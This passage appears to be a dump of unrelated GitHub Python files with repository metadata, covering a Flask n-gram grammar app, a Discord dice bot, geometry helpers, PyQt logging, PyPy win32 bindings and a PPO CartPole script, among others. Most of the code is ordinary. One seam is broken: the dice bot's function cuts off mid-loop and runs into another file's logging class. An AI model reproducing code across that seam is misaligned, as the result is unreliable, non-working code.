pickle\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef home():\r\n return render_template(\"home.html\")\r\n\r\n\r\n@app.route(\"/train\", methods=['POST'])\r\n@cross_origin()\r\ndef trainRouteClient():\r\n\r\n try:\r\n if request.json['max_ngram'] is not None:\r\n max = request.json['max_ngram']\r\n\r\n path_dataset = 'en_US.twitter.txt'\r\n data = load_data(path_dataset)\r\n preprocessor = Preprocessor()\r\n tokenized_training_sentences = preprocessor.get_tokenized_data(data)\r\n nr_unique_words = len(set([y for x in tokenized_training_sentences for y in x]))\r\n\r\n dic_ngram_counts = {}\r\n\r\n for i in range(1, max+1):\r\n i_gram_counts = count_n_grams(tokenized_training_sentences, i)\r\n dic_ngram_counts[i] = i_gram_counts\r\n\r\n model_training_infos = {'nr_unique_words': nr_unique_words,\r\n 'dic_ngram_counts': dic_ngram_counts}\r\n with open(\"model_training_infos.pkl\", \"wb\") as file:\r\n pickle.dump(model_training_infos, file)\r\n\r\n with open(\"max_ngram.pkl\", \"wb\") as file:\r\n pickle.dump(max, file)\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! 
%s\" % e)\r\n return Response(\"N_Grams Counts Built Successfully / Training successfull!!\")\r\n\r\n\r\n@app.route(\"/tuning\", methods=['POST'])\r\n@cross_origin()\r\ndef tuneClient():\r\n try:\r\n threshold_values = [pow(10, i) for i in range(-20, -12, 1)]\r\n k_values = np.linspace(0.1, 0.9, 8)\r\n with open('model_training_infos.pkl', 'rb') as file:\r\n encoded_training_infos = pickle.load(file)\r\n nr_unique_words = encoded_training_infos['nr_unique_words']\r\n dic_ngram_counts = encoded_training_infos['dic_ngram_counts']\r\n\r\n test_sentences_labels = [['How are you', 1],\r\n ['I am going home.', 1],\r\n ['I are going here.', 0],\r\n ['This are perfect', 0],\r\n ['This is perfect', 1],\r\n ['I am doing it.', 1],\r\n ['These man is very dangerous', 0],\r\n ['Today i am very tired!', 1],\r\n ['He has been doing this job for many years as a data scientist in finance domain.',\r\n 1],\r\n [\"You has helped me !\", 0],\r\n [\"My university are over there\", 0],\r\n [\"My mom cook pancakes for breakfast.\", 0]]\r\n\r\n test_sentences = [sent[0] for sent in test_sentences_labels]\r\n true_labels = [x[1] for x in test_sentences_labels]\r\n\r\n model_builder = ModelBuilding()\r\n dic, tuned_hyperparameters_dic = model_builder.hyperparameter_tuning(2, threshold_values, k_values, dic_ngram_counts, test_sentences,\r\n true_labels, nr_unique_words)\r\n\r\n models_df = pd.DataFrame()\r\n models_df['(Threshold, K)'] = list(dic.keys())\r\n models_df['AUC_Score'] = [scores[0] for scores in list(dic.values())]\r\n models_df['F1_Score'] = [scores[1] for scores in list(dic.values())]\r\n models_df['Recall'] = [scores[2] for scores in list(dic.values())]\r\n models_df.to_csv('tuning.csv', index=False)\r\n tuned_threshold = models_df[models_df['AUC_Score'] == max(models_df['AUC_Score'])].tail(1)['(Threshold, K)'].iloc[0][0]\r\n tuned_k = models_df[models_df['AUC_Score'] == max(models_df['AUC_Score'])].tail(1)['(Threshold, K)'].iloc[0][1]\r\n\r\n return Response(f\"Hyperparameter Tuning Successfull!! Tuned Threshold : {tuned_threshold} , T\"\r\n f\"Tuned K-Smoothing Parameter : {tuned_k}\")\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! 
%s\" % e)\r\n return Response(\"Hyperparameter Tuning Successfull!!\")\r\n\r\n\r\n\r\n@app.route(\"/predict\", methods=[\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef predict():\r\n if request.method == \"POST\":\r\n test_sentence = request.form['input_sentence']\r\n ngram = int(request.form['ngram'])\r\n\r\n with open('max_ngram.pkl', 'rb') as file:\r\n max_ngram = pickle.load(file)\r\n if (ngram >= 2) and (ngram <= max_ngram):\r\n test_sentences = [test_sentence]\r\n\r\n # Load the model\r\n # A) load the dictionary which includes the threshold and k-smoothing parameter\r\n with open('hyperparameters.json', 'r') as myfile:\r\n encoded_hyperparams_str = myfile.read()\r\n encoded_hyperparams = json.loads(encoded_hyperparams_str)\r\n threshold = encoded_hyperparams['threshold']\r\n k_smoothing_parameter = encoded_hyperparams['k']\r\n\r\n # B) load the nr of unique words (vocabulary size) and the n-grams counts dictionary\r\n with open('model_training_infos.pkl', 'rb') as file:\r\n encoded_training_infos = pickle.load(file)\r\n nr_unique_words = encoded_training_infos['nr_unique_words']\r\n dic_ngram_counts = encoded_training_infos['dic_ngram_counts']\r\n\r\n model_builder = ModelBuilding()\r\n output_dic, predictions = model_builder.ngram_language_model(ngram, test_sentences, dic_ngram_counts,\r\n threshold, nr_unique_words, k_smoothing_parameter)\r\n\r\n\r\n return render_template('home.html', prediction_text=output_dic[test_sentence][0])\r\n\r\n else:\r\n return render_template('home.html', prediction_text='Value of N must be greater than 1 and lower than ' + str(max_ngram+1))\r\n\r\n return render_template(\"home.html\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"Lori10/Grammer-Checker-Corrector-with-NgramLM-and-T5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23866886401","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass MyClient(discord.Client, commands.Cog):\n async def join(self, ctx):\n await ctx.author.voice.channel.connect()\n def Dice(self, d):\n if(d==\"\"): return 0\n else:\n num=str()\n d_type=str()\n p=0\n try:\n while d[p]!=\"d\":\n num+=d[p]\n p+=1\n p+=1\n while p < len(d):\n d_type += d[p]\n p += 1\n num = int(num)\n d_type = int(d_type)\n part_res = 0\n for i in range(num):\n part_res += random.randint(1, d_type)\n return part_res\n except IndexError: return int(num)\n\n def count(self, text):\n pointer=11\n part=str()\n res=0\n while pointer \n \"\"\"\n if content.item_code not in self.glossaries:\n log_items = [str(content.content_type), str(content.item_code), str(content.title)]\n return log_items\n return None\n \n def save_log(self, log_file, log_items):\n if len(log_items) > 0:\n with open(log_file, 'ab') as file:\n if isinstance(log_items[0], str):\n log = \"\\t\".join(log_items)\n log += \"\\r\\n\"\n file.write(log.encode('UTF-8'))\n else:\n for log in log_items:\n log = \"\\t\".join(log)\n log += \"\\r\\n\"\n file.write(log.encode('UTF-8'))\n \n","repo_name":"cephalopodblue/YouTubePerformanceIngest","sub_path":"util/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70361745769","text":"import math\nimport random\n\n\nclass CaculateAngle:\n\n def cross_point(self, line1, line2): # 计算交点函数\n x1 = line1[0] # 取四点坐标\n y1 = 
line1[1]\n x2 = line1[2]\n y2 = line1[3]\n\n x3 = line2[0]\n y3 = line2[1]\n x4 = line2[2]\n y4 = line2[3]\n\n if (x4 - x3) == 0: # L2直线斜率不存在操作\n k2 = None\n b2 = 0\n x = x3\n k1 = (y2 - y1) * 1.0 / (x2 - x1) # 计算k1,由于点均为整数,需要进行浮点数转化\n b1 = y1 * 1.0 - x1 * k1 * 1.0 # 整型转浮点型是关键\n y = k1 * x * 1.0 + b1 * 1.0\n elif (x2 - x1) == 0:\n k1 = None\n b1 = 0\n x = x1\n k2 = (y4 - y3) * 1.0 / (x4 - x3)\n b2 = y3 * 1.0 - x3 * k2 * 1.0\n y = k2 * x * 1.0 + b2 * 1.0\n else:\n k1 = (y2 - y1) * 1.0 / (x2 - x1) # 计算k1,由于点均为整数,需要进行浮点数转化\n k2 = (y4 - y3) * 1.0 / (x4 - x3) # 斜率存在操作\n b1 = y1 * 1.0 - x1 * k1 * 1.0 # 整型转浮点型是关键\n b2 = y3 * 1.0 - x3 * k2 * 1.0\n x = (b2 - b1) * 1.0 / (k1 - k2)\n y = k1 * x * 1.0 + b1 * 1.0\n return [x, y]\n\n # line1 = [0, 4, 0, 2]\n # line2 = [2, 0, 3, 0]\n # print(cross_point(line1, line2))\n\n # 三角形三条边长度求第二条边对角角度\n def caculate_from_triangle(self, line_a, line_b, line_c):\n \"\"\"\n 通过三角形三条边,利用三角函数计算cosB的值,再利用反余弦,求B的角度。\n :param line_a: 33\n :param line_b: 22\n :param line_c: 11\n\n :return: float\n \"\"\"\n line_a, line_b, line_c = line_a, line_b, line_c\n angle = (line_a ** 2 - line_b ** 2 + line_c ** 2) / (2 * line_a * line_c)\n return math.acos(angle) * 180 / math.pi\n\n # 三个点构成的夹角\n def caculate_from_line(self, point_A, point_B, point_C):\n \"\"\"\n 利用三个点,构建三角形\n :param point_A: [1,2]\n :param point_B: [1,2],夹角,所求的角度的点\n :param point_C: [1,2]\n :return: float\n \"\"\"\n point_a = point_A\n point_b = point_B\n point_c = point_C\n # print(point_a, point_b, point_c)\n x1 = point_b[0] - point_a[0]\n y1 = point_a[1] - point_b[1]\n\n x2 = point_c[0] - point_a[0]\n y2 = point_a[1] - point_c[1]\n\n x3 = point_c[0] - point_b[0]\n y3 = point_c[1] - point_b[1]\n\n line_c = math.sqrt(x1 ** 2 + y1 ** 2)\n line_b = math.sqrt(x2 ** 2 + y2 ** 2)\n line_a = math.sqrt(x3 ** 2 + y3 ** 2)\n\n return self.caculate_from_triangle(line_a, line_b, line_c)\n\n # 两条直线的夹角\n def caculate_from_points(self, line_regression_line_a, line_regression_line_b):\n \"\"\"\n 线性回归拟合出的两条直线\n :param line_regression_line_a: [[713, -18], [611, -95]]\n :param line_regression_line_b: [[611, -95], [312, -2]]\n :return: float\n \"\"\"\n list1 = list(range(3))\n for i in line_regression_line_a:\n for j in line_regression_line_b:\n if i == j:\n list1[1] = i\n line_regression_line_a.remove(i)\n line_regression_line_b.remove(j)\n list1[0] = random.choice(line_regression_line_a)\n list1[2] = random.choice(line_regression_line_b)\n point_A, point_B, point_C = list1[0], list1[1], list1[2]\n return self.caculate_from_line(point_A, point_B, point_C)\n","repo_name":"lishijia2740/batch_processing_work","sub_path":"Bingu/Bingu_C/caculate.py","file_name":"caculate.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4423512597","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 30 20:43:18 2021\n\n@author: yuki\n\"\"\"\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\n\n\n#データ読み込み及び平均0に修正\ndf = pd.read_csv('j.csv', header=1)\nprint(df)\n\n#print(df.iloc[5][\"second\"])\n\nVol_mean = df[\"Volt\"].mean()\nprint(Vol_mean)\n\nVol1_mean = df[\"Volt.1\"].mean()\nprint(Vol1_mean)\n\n\n\n#平均を0にするように平行移動\n#https://deepage.net/features/pandas-iteration.html\nfor j, i in df.iterrows():\n i[\"Volt.1\"] = i[\"Volt.1\"] - Vol1_mean\n i[\"Volt\"] = i[\"Volt\"] - Vol_mean\n\n\n\n#グラフを書いてみる\n#https://note.nkmk.me/python-pandas-plot/\ndf.plot()\ndf.plot(x=\"second\")\ndf.plot(x=\"second\", 
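# caculate_from_triangle() above is the law of cosines solved for the angle
# opposite side b: cos(B) = (a**2 - b**2 + c**2) / (2*a*c). A quick check on
# a 3-4-5 right triangle, where the angle opposite the hypotenuse is 90 degrees:
import math

a, b, c = 3.0, 5.0, 4.0             # b = 5 is the hypotenuse
cos_B = (a**2 - b**2 + c**2) / (2 * a * c)
assert abs(math.degrees(math.acos(cos_B)) - 90.0) < 1e-9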
y=\"Volt.1\")\ndf.plot(x=\"second\", y=\"Volt\")\n\n\n\n\n#最大値のみ取り出す\nnew = pd.DataFrame()\n\nfor i in range(len(df)-2):\n if (df.loc[i][\"Volt.1\"] < df.loc[i+1][\"Volt.1\"]) and (df.loc[i+1][\"Volt.1\"] > df.loc[i+2][\"Volt.1\"]):\n #print(df.loc[i+1])\n print(df[i+1:i+2])\n new = new.append(df[i+1:i+2])\n\n\n\n\ndiffsec_mean=new[\"second\"].diff().mean()\nprint(new[\"second\"].diff())\nprint(\"時間差平均は\"+str(diffsec_mean))\nprint(\"周波数は\"+str(1/diffsec_mean))\n\n\nnew.plot(x=\"second\")\nnew.plot.scatter(x='second', y='Volt.1', alpha=0.5)\nnew.to_csv(\"newj.csv\")\n","repo_name":"yuki-2000/school","sub_path":"free-vibration.py","file_name":"free-vibration.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"237471898","text":"from upax.model.Question import Question\nfrom operator import itemgetter\nimport itertools\n\n\nclass Utils:\n\n @staticmethod\n def get_priority(str):\n payload = {\n 'ALTA': 1,\n 'MEDIA': 2,\n 'BAJA': 3\n }\n return payload[str]\n\n @staticmethod\n def get_register_type(str):\n payload = {\n 'STANDARD': 1,\n 'ADVANCED': 2\n }\n return payload[str]\n\n @staticmethod\n def set_visit_status(status):\n payload = {\n 0: 'Pendiente',\n 1: 'En revisión',\n 2: 'En proceso',\n 3: 'Rechazada',\n 4: 'Finalizada'\n }\n return payload[status]\n\n @staticmethod\n def set_status(id_status):\n payload = {\n 0: 'Eliminada',\n 1: 'Libre',\n 2: 'Sin Terminar',\n 3: 'Terminada',\n 4: 'Cancelada por Usuario',\n 5: 'Abandonada',\n 6: 'Vencida',\n 7: 'Evidencia extraida por usuario',\n 8: 'Desactivada',\n 9: 'Replantada',\n 12: 'Sincronizando Multimedia'\n }\n result = payload[id_status] if id_status in payload else 'Desactivada'\n return result\n\n @staticmethod\n def group_by_param(field_name, list_data):\n response = {}\n for key, group in itertools.groupby(sorted(list_data, key=itemgetter(field_name)), key=lambda x: x[field_name]):\n response[key] = list(group)\n return response\n\n @staticmethod\n def get_section(list_data):\n sections = []\n count = 0\n for data in list_data:\n if (data['FIIDTIPOPREGUNTA'] == 12):\n name = '' if isinstance(data['FCTEXTOPREGUNTA'], list) and len(data['FCTEXTOPREGUNTA']) == 0 else data[\n 'FCTEXTOPREGUNTA']\n count += 1\n sections.append({\n 'name': name,\n 'questions': [],\n 'id': count\n })\n else:\n question_id = data['FIIDPREGUNTA']\n question = '' if isinstance(data['FCTEXTOPREGUNTA'], list) and len(data['FCTEXTOPREGUNTA']) == 0 else \\\n data['FCTEXTOPREGUNTA']\n answer = data['FCTEXTORESPUESTACONTESTO']\n if answer is not None:\n sections[count - 1]['questions'].append(\n Question(id_question=question_id, name=question, answer=answer).build())\n else:\n if not (data['FIIDTIPOPREGUNTA'] == 17 or data['FIIDTIPOPREGUNTA'] == 27):\n sections[count - 1]['questions'].append(Question(id_question=question_id, name=question, answer=\"Sin respuesta\").build())\n return sections\n\n # las preguntas tienen que estar ordenadas\n @staticmethod\n def merge_answers_template(answers, template):\n\n merge_answers_template = []\n template_answers = template[0][\"questions\"]\n tamaño_template_answers = len(template_answers)\n first_answers_id = answers[0][\"FIIDPREGUNTA\"]\n # first_template_answers_id = template_answers[0][\"questionId\"]\n while first_answers_id != template_answers[0][\"questionId\"]:\n template_answers.pop(0)\n # recorrer las preguntas del template para de aqui armarlo\n # no pueden existir mas respuestas que preguntas\n '''\n for i in 
range(len(template_answers)):\n if template_answers[i][\"questionId\"] == answers[i][\"FIIDPREGUNTA\"]:\n print(\"iguales\")\n merge_answers_template.append(answers[i])\n else:\n print(\"no son iguales\")\n merge_answers_template.append(default_answer(template_answers[i][\"questionId\"],\n template_answers[i][\"question\"],\n \"Sin respuesta\"))'''\n x = 0\n y = 0\n while x < len(template_answers):\n if y < len(answers) and template_answers[x][\"questionId\"] == answers[y][\"FIIDPREGUNTA\"]:\n print(\"iguales\")\n merge_answers_template.append(answers[y])\n x = x + 1\n y = y + 1\n else:\n print(\"no son iguales\")\n pregunta_default = default_answer(template_answers[x][\"questionId\"],\n template_answers[x][\"question\"],\n \"Sin respuesta\")\n merge_answers_template.append(pregunta_default)\n x = x + 1\n return merge_answers_template\n\ndef default_answer(questionId, textoPregunta, textoRespuesta):\n answer = {\n 'FIIDENCUCONTESTADA': '',\n 'FIORDEN': '',\n 'FIIDPREGUNTA': questionId, # IMPORTANTE\n 'FCTEXTOPREGUNTA': textoPregunta, # data['FCTEXTOPREGUNTA']\n 'FCTEXTORESPUESTACONTESTO': textoRespuesta, # FCTEXTORESPUESTACONTESTO\n 'FIIDTIPOPREGUNTA': '',\n 'FIIDOPCIONRESPUESTA': '',\n 'FIIDPREGUNTAALTERNA': ''\n }\n return answer\n","repo_name":"rafael1996-git/upaxer-ws-cites-drake-pythom","sub_path":"common/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13296171043","text":"import os\nimport sys\nimport shutil\nimport json\nimport random\n\ndef display_json(json_dir):\n\tclass_list = []\n\tclass_dict = {}\n\tfor one_json in os.listdir(json_dir):\n\t\tjson_str = open(os.path.join(json_dir,one_json),'r', encoding='UTF-8')\n\t\tjson_dict = json.load(json_str)\n\t\tclass_name = json_dict[0]['label']\n\t\tif class_name not in class_list:\n\t\t\tclass_list.append(class_name)\n\t\t\tclass_dict[class_name] = 1\n\t\telse:\n\t\t\tclass_dict[class_name] += 1\n\tfor one_name in class_list:\n\t\tprint(one_name,class_dict[one_name])\n\tfor one_name in class_list:\n\t\tprint(class_dict[one_name])\n\t\n\t\t\n\nif __name__ == '__main__':\n\n\t# label_dir = \"D:/yang.xie/aidi_projects/check_class/xbq-b/RegClassify_0/label\"\n\t# display_json(label_dir)\n\n\t# label_dir = \"D:/yang.xie/aidi_projects/update-label0918/data/数据筛查_json/6通道_fix/label\"\n\tlabel_dir = r\"D:\\yang.xie\\aidi_projects\\20210129-pcb-newlabel\\20210419_big_set\\cls\\label\"\n\tdisplay_json(label_dir)\n\n\t\n\n\n\n\n\n\n\t\t\t\t\t\n\n\n\n","repo_name":"plzo/git-note","sub_path":"scripts/analysis_class_num.py","file_name":"analysis_class_num.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39659306119","text":"import sys\nfrom multiprocessing import Queue\nfrom functools import reduce\n\nfrom PyQt5 import QtCore\n\n\nclass TextStream:\n \"\"\"\n Writes to the appropriate queues.\n\n \"\"\"\n\n def __init__(self, window):\n self.queue = Queue()\n self.window = window\n\n def write(self, text):\n self.queue.put((0, str(text)))\n\n def write_html(self, html):\n self.queue.put((1, html))\n\n def flush(self):\n pass\n\n\nclass TextReceiver(QtCore.QObject):\n \"\"\"\n Hangs out a background thread and displays messages in the GUI.\n\n \"\"\"\n\n write_text_signal = QtCore.pyqtSignal(str)\n write_html_signal = QtCore.pyqtSignal(str)\n\n # An instance of a TextStream that has the queue that the worker 
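# Utils.group_by_param() above sorts before calling itertools.groupby, and
# that matters: groupby only merges *adjacent* equal keys, so unsorted input
# silently splits groups. A minimal demonstration:
import itertools

data = ['a', 'b', 'a']
assert [k for k, _ in itertools.groupby(data)] == ['a', 'b', 'a']
assert [k for k, _ in itertools.groupby(sorted(data))] == ['a', 'b']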
thread reads from\n TEXT_STREAM = None\n\n # Receives text and writes it to the status bar\n TEXT_RECEIVER = None\n\n # The worker thread\n TEXT_THREAD = None\n\n # A reference to the main window\n WINDOW = None\n\n @staticmethod\n def redirect_close():\n \"\"\"\n Closes the worker thread\n\n \"\"\"\n TextReceiver.TEXT_RECEIVER.running = False\n TextReceiver.TEXT_THREAD.quit()\n\n @staticmethod\n def init(main_window, *args, **kwargs):\n \"\"\"\n Initializes the static members of the class and starts the background thread.\n\n \"\"\"\n TextReceiver.TEXT_STREAM = TextStream(main_window)\n\n TextReceiver.WINDOW = main_window\n # Create a receiver\n TextReceiver.TEXT_RECEIVER = TextReceiver(TextReceiver.TEXT_STREAM.queue, *args, **kwargs)\n # Create a thread for the receiver to install.py in\n TextReceiver.TEXT_THREAD = QtCore.QThread()\n # Connect the signal to the console output handler in the main window\n # Connect the console output signals\n TextReceiver.TEXT_RECEIVER.write_text_signal.connect(lambda st: main_window.text_log(st))\n TextReceiver.TEXT_RECEIVER.write_html_signal.connect(\n lambda html: main_window.html_log(html))\n # Move the receiver to the background thread\n TextReceiver.TEXT_RECEIVER.moveToThread(TextReceiver.TEXT_THREAD)\n # When the thread starts, start the text receiver\n TextReceiver.TEXT_THREAD.started.connect(TextReceiver.TEXT_RECEIVER.run)\n # Start thread\n TextReceiver.TEXT_THREAD.start()\n\n def __init__(self, queue, *_args, **_kwargs):\n QtCore.QObject.__init__(self)\n self.queue = queue\n self.running = True\n\n def run(self):\n \"\"\"\n Until the thread should close, read things from the queue and emit the appropriate signal to\n display them in\n the GUI.\n\n \"\"\"\n while self.running:\n (ty, text) = self.queue.get()\n if ty == 0:\n self.write_text_signal.emit(text)\n else:\n self.write_html_signal.emit(text)\n\n\ndef print_html_to_status_bar(arg):\n TextReceiver.TEXT_STREAM.write_html(arg)\n\n\ndef debug(*args, **kwargs):\n \"\"\"\n Prints directly to stderr. \n \n \"\"\"\n\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef log(*args):\n \"\"\"\n Prints to the console_output with a fancy lookin log label.\n\n \"\"\"\n s = reduce(lambda l, r: f\"{l}, {r}\", args)\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'
[Log] {s}...')\n else:\n print_html_to_status_bar(f'[Log] {s}')\n print(\"[Log] \", s, file=sys.__stdout__)\n\n\ndef err_log(dat):\n \"\"\"\n Prints to the console_output with a fancy lookin error label.\n\n \"\"\"\n s = str(dat)\n\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'[Error] {s}...')\n else:\n print_html_to_status_bar(f'[Error] {s}')\n print(\"[Err] \", str(dat), file=sys.__stdout__)\n\n\ndef debug_log(dat):\n \"\"\" \n Writes to the status bar and to stdout\n\n \"\"\"\n s = str(dat)\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'[Debug]
 {s}')\n print(\"[Debug] \", str(dat), file=sys.__stdout__)\n","repo_name":"hitranonline/hapiest","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"11167323769","text":"\"\"\"\nlecture 21 \ntime\nspace\n\"\"\"\n\n# implementations of the same functional abstraction can require different amounts of time\n\n# e.g., how many factors does a positive integer n have\n\ndef factors(n):\n\t\"\"\"\n\ttime: number of division \n\t(1) slow: test each k from 1 through n --> n\n\t(2) fast: test each k from 1 to square root n\n\t\tfor every k, n/k is also a factor --> n ** 0.5\n\t\"\"\"\n\ttotal = 0\n\tfor k in range(1, n+1):\n\t\tif divides(k, n):\n\t\t\ttotal += 1\n\treturn total\n\nfrom math import sqrt\ndef factors_fast(n):\n\ttotal = 0\n\tsqrt_n = sqrt(n)\n\tk = 1\n\twhile k < sqrt_n:\n\t\tif divides(k, n):\n\t\t\ttotal += 2 # one for k, one for n/k\n\t\tk += 1\n\tif k*k == n:\n\t\ttotal += 1 # perfect sqrt, add the sqrt value, n/sqrt=sqrt, so just need add 1\n\treturn total\n\t\n\t\ndef divides(k, n):\n\treturn n%k == 0\n\t\n# the consumption of space\n\n# order of growth\n\n# exponentiation\ndef exp(b, n):\n\tif n == 0:\n\t\treturn 1\n\treturn b* exp(b, n-1)\n\t\ndef square(x):\n\treturn x*x\ndef fast_exp(b, n):\n\tif n == 0:\n\t\treturn 1\n\telif n % 2==0:\n\t\treturn square(fast_exp(b, n//2))\n\telse:\n\t\treturn b * fast_exp(b, n-1)\n\t\n","repo_name":"rarezhang/ucberkeley_cs61a","sub_path":"lecture/l21_time_space_growth.py","file_name":"l21_time_space_growth.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6444313226","text":"\"\"\" External functions accessing the win32 api.\nCommon types, functions from core win32 libraries, such as kernel32\n\"\"\"\n\nfrom pypy.rpython.tool import rffi_platform\nfrom pypy.translator.tool.cbuild import ExternalCompilationInfo\nfrom pypy.rpython.lltypesystem import lltype, rffi\nimport os\n\n# This module can be imported on any platform,\n# but most symbols are not usable...\nWIN32 = os.name == \"nt\"\n\nif WIN32:\n eci = ExternalCompilationInfo(\n includes = ['windows.h'],\n libraries = ['kernel32'],\n )\nelse:\n eci = ExternalCompilationInfo()\n\nclass CConfig:\n _compilation_info_ = eci\n\n if WIN32:\n DWORD_PTR = rffi_platform.SimpleType(\"DWORD_PTR\", rffi.LONG)\n WORD = rffi_platform.SimpleType(\"WORD\", rffi.UINT)\n DWORD = rffi_platform.SimpleType(\"DWORD\", rffi.UINT)\n BOOL = rffi_platform.SimpleType(\"BOOL\", rffi.LONG)\n INT = rffi_platform.SimpleType(\"INT\", rffi.INT)\n LONG = rffi_platform.SimpleType(\"LONG\", rffi.LONG)\n PLONG = rffi_platform.SimpleType(\"PLONG\", rffi.LONGP)\n LPVOID = rffi_platform.SimpleType(\"LPVOID\", rffi.INTP)\n LPCVOID = rffi_platform.SimpleType(\"LPCVOID\", rffi.VOIDP)\n LPCTSTR = rffi_platform.SimpleType(\"LPCTSTR\", rffi.CCHARP)\n LPDWORD = rffi_platform.SimpleType(\"LPDWORD\", rffi.INTP)\n SIZE_T = rffi_platform.SimpleType(\"SIZE_T\", rffi.SIZE_T)\n\n HRESULT = rffi_platform.SimpleType(\"HRESULT\", rffi.LONG)\n HLOCAL = rffi_platform.SimpleType(\"HLOCAL\", rffi.VOIDP)\n\n DEFAULT_LANGUAGE = rffi_platform.ConstantInteger(\n \"MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT)\")\n\n for name in \"\"\"FORMAT_MESSAGE_ALLOCATE_BUFFER FORMAT_MESSAGE_FROM_SYSTEM\n \"\"\".split():\n locals()[name] = rffi_platform.ConstantInteger(name)\n \n\nfor k, v in 
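# fast_exp() above halves the exponent whenever it is even, giving O(log n)
# multiplications instead of O(n). A compact iterative variant of the same
# square-and-multiply idea (fast_exp_iter is a hypothetical name):
def fast_exp_iter(b, n):
    result = 1
    while n > 0:
        if n % 2 == 1:   # odd exponent: peel off one factor of b
            result *= b
        b *= b           # square the base
        n //= 2          # halve the exponent
    return result

assert fast_exp_iter(3, 10) == 3 ** 10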
rffi_platform.configure(CConfig).items():\n globals()[k] = v\n\ndef winexternal(name, args, result):\n return rffi.llexternal(name, args, result, compilation_info=eci, calling_conv='win')\n\nif WIN32:\n HANDLE = rffi.ULONG\n LPHANDLE = rffi.CArrayPtr(HANDLE)\n HMODULE = HANDLE\n\n GetLastError = winexternal('GetLastError', [], DWORD)\n\n LoadLibrary = winexternal('LoadLibraryA', [rffi.CCHARP], rffi.VOIDP)\n GetProcAddress = winexternal('GetProcAddress',\n [rffi.VOIDP, rffi.CCHARP],\n rffi.VOIDP)\n FreeLibrary = winexternal('FreeLibrary', [rffi.VOIDP], BOOL)\n\n LocalFree = winexternal('LocalFree', [HLOCAL], DWORD)\n\n FormatMessage = winexternal(\n 'FormatMessageA',\n [DWORD, rffi.VOIDP, DWORD, DWORD, rffi.CCHARP, DWORD, rffi.VOIDP],\n DWORD)\n\n\n # A bit like strerror...\n def FormatError(code):\n \"Return a message corresponding to the given Windows error code.\"\n buf = lltype.malloc(rffi.VOIDPP.TO, 1, flavor='raw')\n\n msglen = FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |\n FORMAT_MESSAGE_FROM_SYSTEM,\n None,\n code,\n DEFAULT_LANGUAGE,\n rffi.cast(rffi.VOIDP, buf),\n 0, None)\n\n # FormatMessage always appends a \\n.\n msglen -= 1\n \n result = ''.join([buf[0][i] for i in range(msglen)])\n LocalFree(buf[0])\n return result\n\n def FAILED(hr):\n return rffi.cast(HRESULT, hr) < 0\n\n _GetModuleFileName = winexternal('GetModuleFileNameA',\n [HMODULE, rffi.CCHARP, DWORD],\n DWORD)\n\n def GetModuleFileName(module):\n size = 255 # MAX_PATH\n buf = lltype.malloc(rffi.CCHARP.TO, size, flavor='raw')\n res = _GetModuleFileName(module, buf, size)\n if not res:\n return ''\n else:\n return ''.join([buf[i] for i in range(res)])\n","repo_name":"paskma/pypy-sc","sub_path":"pypy/rlib/rwin32.py","file_name":"rwin32.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70538243688","text":"import gym\nimport tensorflow as tf\nimport numpy as np \n\nfrom training.PPO import *\n\nfrom models.discrete_policy import *\nfrom models.discrete_value import *\n\n## MAIN PART OF THE PROGRAM\nsess = tf.compat.v1.InteractiveSession()\n\npolicyNetFactory = lambda name: PolicyNetwork((4,), 2, [20,20], name=name)\nvalueNetFactory = lambda name: ValueNetwork((4,), 2, [20,20], name=name)\nenvironmentFactory = lambda: gym.make('CartPole-v0')\n\n# Create the agent\nppoAgent = PPOAgent(environmentFactory, valueNetFactory, policyNetFactory)\n\n\n# Create the session and initialize variables\nsess.run(tf.compat.v1.global_variables_initializer())\n\n\n\n# Train the agent\nppoAgent.train(10000)\n\n# Evaluate the agent\nenv = environmentFactory()\nenv.reset()\n\ndone = False\n\nwhile not done:\n\tstate = np.array(env.state)\n\taction = int(ppoAgent.policyNet(state)[0])\n\t_,_,done,_ = 